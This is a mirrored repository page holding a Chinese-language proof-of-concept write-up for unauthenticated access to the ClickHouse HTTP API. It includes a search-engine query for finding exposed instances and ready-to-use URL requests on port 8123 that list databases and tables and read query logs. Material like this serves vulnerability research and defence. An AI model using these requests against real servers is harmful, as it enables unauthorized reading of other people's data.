admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-08 04:18:39 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/服务器应用漏洞/ClickHouse API 数据库接口未授权访问漏洞.md

45 lines
725 B
Markdown
Raw Normal View History

update gitbook
2022-02-20 16:14:31 +08:00
# ClickHouse API 数据库接口未授权访问漏洞
## 漏洞描述
ClickHouse API 数据库接口存在未授权访问漏洞攻击者通过漏洞可以执行任意SQL命令获取数据库数据
## 漏洞影响
```
ClickHouse
```
更新漏洞
2023-08-28 15:55:36 +08:00
## 网络测绘
update gitbook
2022-02-20 16:14:31 +08:00
```
"ClickHouse" && body="ok"
```
## 漏洞复现
登录页面
更新漏洞
2022-12-05 11:09:28 +08:00
![img](./images/202202091258079.png)
update gitbook
2022-02-20 16:14:31 +08:00
执行SQL语句
更新漏洞
2022-12-05 11:09:28 +08:00
![img](./images/202202091258245.png)
update gitbook
2022-02-20 16:14:31 +08:00
更新README.md
2023-07-25 17:16:05 +08:00
```
http://your-ip:8123/?query=SELECT%20*%20FROM%20system.query_thread_log%20LIMIT%201%20FORMAT%20Vertical
```
![img](images/202202091258274-16898396122771.png)
其他的SQL语句
```
http://your-ip:8123/?query=SHOW%20DATABASES
```
```
http://your-ip:8123/?query=SELECT%20*%20FROM%20system.tables
update gitbook
2022-02-20 16:14:31 +08:00
```
Reference in New Issue Copy Permalink